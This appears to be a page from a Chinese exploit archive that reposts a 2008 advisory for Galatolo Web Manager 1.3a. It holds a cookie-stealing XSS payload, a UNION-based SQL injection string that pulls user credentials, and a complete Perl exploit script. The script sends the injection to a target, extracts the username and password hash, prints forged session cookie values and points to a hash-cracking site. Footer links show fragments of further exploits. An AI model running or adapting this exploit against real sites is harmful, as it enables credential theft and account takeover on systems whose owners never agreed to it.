Galatolo Web Manager 1.3a

所属分类: 网络安全 / Exploit 阅读数: 105
收藏 0 赞 0 分享
--== ============================================================================ ==--
--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--
--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it
[ ] Discovered On: 14 Jul 2008
[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a
[ ] all.php?tag= [Code Javascript]
[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a
[ ] plugins/users/index.php?id= [Code SQL]
[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl
use strict;
use LWP::UserAgent;

my $host = shift;
my ($start,$content,@login);
my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http:\/\/?/i)
{
$start = new LWP::UserAgent or die "[ ] Unable to connect\n";
$start->timeout(1);
$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
$content = $start->get($host.$evilxx);

if($content->is_success)
{
if($content->content =~ /%(. ?)%([0-9a-f]{32})/)
{
push(@login,$1,$2);
print "[ ] Login:\n";
print "[ ] Username: $login[0]\n";
print "[ ] Password: $login[1]\n\n";

print "[ ] Cookie Session:\n";
print "[ ] gwm_user = $login[0]\n";
print "[ ] gwm_pass = $login[1]\n\n";

print "[ ] Crack Password:\n";
print "[ ] md5(md5(password)) for crack:\n";
print "[ ] http://passcracking.com\n";
}
else
{
print "[ ] Exploit Failed\n";
print "[ ] Site Not Vulnerable\n";
}
}
}
else
{
print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
print "[ ] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
print "[ ] Usage: Perl $0 <host>\n";
print "[ ] Usage: Perl $0 http://site.com\n";
}
更多精彩内容其他人还在看

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi
收藏 0 赞 0 分享

MyBulletinBoard (MyBB)

<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0 赞 0 分享

Acoustica Mixcraft

#!/usr/bin/perl # # Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit # Author: Koshi # # Date: 08-28-08 ( 0day ) # Ap
收藏 0 赞 0 分享

Simple PHP Blog (SPHPBlog)

<? /* sIMPLE php bLOG 0.5.0 eXPLOIT bY mAXzA 2008 */ function curl($url,$postvar){ global $cook; $ch = cur
收藏 0 赞 0 分享

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Arbitrary File Corruptio
收藏 0 赞 0 分享

Dana IRC 1.4a Remote Buffer Overflow Exploit

#!/usr/bin/perl # k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM. # I was loo
收藏 0 赞 0 分享

GeekLog

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO;
收藏 0 赞 0 分享

NoName Script

################################################################################ [ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0 赞 0 分享

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "
收藏 0 赞 0 分享

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Be
收藏 0 赞 0 分享
查看更多